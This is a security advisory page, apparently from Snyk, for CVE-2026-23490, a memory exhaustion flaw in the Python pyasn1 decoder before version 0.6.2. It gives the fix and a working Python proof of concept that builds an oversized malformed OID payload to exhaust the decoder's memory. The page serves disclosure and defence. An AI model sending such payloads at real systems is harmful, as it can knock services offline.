Allocation of Resources Without Limits or Throttling Affecting pyasn1 package, versions [,0.6.2)
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsSnyk Learn
Learn about Allocation of Resources Without Limits or Throttling vulnerabilities in an interactive lesson.
Start learning- Snyk IDSNYK-PYTHON-PYASN1-15032639
- published18 Jan 2026
- disclosed16 Jan 2026
- credittsigouris007
Introduced: 16 Jan 2026
CVE-2026-23490 (opens in a new tab)How to fix?
Upgrade pyasn1 to version 0.6.2 or higher.
Overview
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the valueDecoder function in decoder.py. An attacker can cause memory exhaustion by submitting a malformed RELATIVE-OID containing excessive continuation octets.
PoC
import pyasn1.codec.ber.decoder as decoder
import pyasn1.type.univ as univ
import sys
import resource
# Deliberately set memory limit to display PoC
try:
resource.setrlimit(resource.RLIMIT_AS, (100*1024*1024, 100*1024*1024))
print("[*] Memory limit set to 100MB")
except:
print("[-] Could not set memory limit")
# Test with different payload sizes to find the DoS threshold
payload_size_mb = int(sys.argv[1])
print(f"[*] Testing with {payload_size_mb}MB payload...")
payload_size = payload_size_mb * 1024 * 1024
# Create payload with continuation octets
# Each 0x81 byte indicates continuation, causing bit shifting in decoder
payload = b'\x81' * payload_size + b'\x00'
length = len(payload)
# DER length encoding (supports up to 4GB)
if length < 128:
length_bytes = bytes([length])
elif length < 256:
length_bytes = b'\x81' + length.to_bytes(1, 'big')
elif length < 256**2:
length_bytes = b'\x82' + length.to_bytes(2, 'big')
elif length < 256**3:
length_bytes = b'\x83' + length.to_bytes(3, 'big')
else:
# 4 bytes can handle up to 4GB
length_bytes = b'\x84' + length.to_bytes(4, 'big')
# Use OID (0x06) for more aggressive parsing
malicious_packet = b'\x06' + length_bytes + payload
print(f"[*] Packet size: {len(malicious_packet) / 1024 / 1024:.1f} MB")
try:
print("[*] Decoding (this may take time or exhaust memory)...")
result = decoder.decode(malicious_packet, asn1Spec=univ.ObjectIdentifier())
print(f'[+] Decoded successfully')
print(f'[!] Object size: {sys.getsizeof(result[0])} bytes')
# Try to convert to string
print('[*] Converting to string...')
try:
str_result = str(result[0])
print(f'[+] String succeeded: {len(str_result)} chars')
if len(str_result) > 10000:
print(f'[!] MEMORY EXPLOSION: {len(str_result)} character string!')
except MemoryError:
print(f'[-] MemoryError during string conversion!')
except Exception as e:
print(f'[-] {type(e).__name__} during string conversion')
except MemoryError:
print('[-] MemoryError: Out of memory!')
except Exception as e:
print(f'[-] Error: {type(e).__name__}: {e}')
print("\n[*] Test completed")